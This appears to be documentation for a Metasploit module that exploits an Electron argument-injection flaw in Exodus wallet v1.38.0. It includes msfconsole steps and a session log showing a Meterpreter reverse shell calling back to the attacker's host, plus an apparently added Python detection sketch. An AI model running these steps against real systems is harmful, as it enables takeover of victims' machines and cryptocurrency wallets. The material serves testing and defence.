Description
This module exploits an Electron remote code execution vulnerability in Exodus wallet. The vulnerability in Electron's protocol handler makes it possible to inject command-line arguments via the URI handler. This module has been tested successfully on Windows 10 Enterprise x64. The vulnerable application, Exodus v1.38.0, is available for download.
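For defenders, the argument injection described above can be seen in process-creation telemetry: a protocol-handler launch normally carries only the URI, so extra switches next to it are worth an alert. The following is an added detection sketch, not part of the module or of Exodus; the `exodus://` scheme name, the install path and the sample command lines are assumptions constructed for illustration.

```python
import re

SCHEME = "exodus"  # assumed URI scheme name (not stated in this document)

def split_windows_cmdline(cmdline):
    """Minimal Windows-style split: double quotes group, whitespace separates.
    Backslash escaping of quotes is not modelled (simplification)."""
    args, cur, in_quotes, started = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
            started = True
        elif ch.isspace() and not in_quotes:
            if started:
                args.append("".join(cur))
                cur, started = [], False
        else:
            cur.append(ch)
            started = True
    if started:
        args.append("".join(cur))
    return args

def injected_switches(cmdline, scheme=SCHEME):
    """Return switch-like arguments that accompany a scheme:// argument."""
    argv = split_windows_cmdline(cmdline)[1:]  # drop the executable path
    if not any(a.lower().startswith(scheme + "://") for a in argv):
        return []  # not a protocol-handler launch, out of scope here
    return [a for a in argv if re.match(r"--?[A-Za-z]", a)]

# Constructed process-creation command lines (placeholder path and values),
# not real telemetry.
SAMPLE_EVENTS = [
    r'"C:\Apps\Exodus\Exodus.exe"',
    r'"C:\Apps\Exodus\Exodus.exe" "exodus://placeholder"',
    r'"C:\Apps\Exodus\Exodus.exe" "exodus://placeholder" --example-switch=value',
]

def triage(events):
    """Keep only the events where a URI launch also carries switches."""
    return [(e, s) for e in events if (s := injected_switches(e))]

if __name__ == "__main__":
    for event, switches in triage(SAMPLE_EVENTS):
        print("ALERT", switches, "in", event)
```

In practice the command lines would come from process-creation logging on the endpoint, and any switches the application legitimately receives on URI launches would need to be allow-listed.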
Verification Steps
- Install Exodus Wallet version v1.38.0
- Start msfconsole
- Do: use exploit/windows/browser/exodus
- Do: set PAYLOAD windows/meterpreter/reverse_tcp
- Do: set LHOST ip
- Do: exploit
- On the target machine, browse to the malicious URL and launch Exodus
- Verify the Meterpreter session is opened
Scenarios
Exodus Wallet v1.38.0 on Windows 10 Enterprise x64
msf > use exploit/windows/browser/exodus
msf exploit(windows/browser/exodus) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/browser/exodus) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(windows/browser/exodus) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Using URL: http://0.0.0.0:80/
msf exploit(windows/browser/exodus) > [*] Local IP: http://172.16.40.5:80/
[*] Server started.
[*] 172.16.40.149 exodus - Delivering Payload
[*] Sending stage (179779 bytes) to 172.16.40.149
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.149:49726) at 2018-02-23 15:40:17 +0000
msf exploit(windows/browser/exodus) > sessions 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-PI8214R
OS : Windows 10 (Build 10586).
Architecture : x64
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >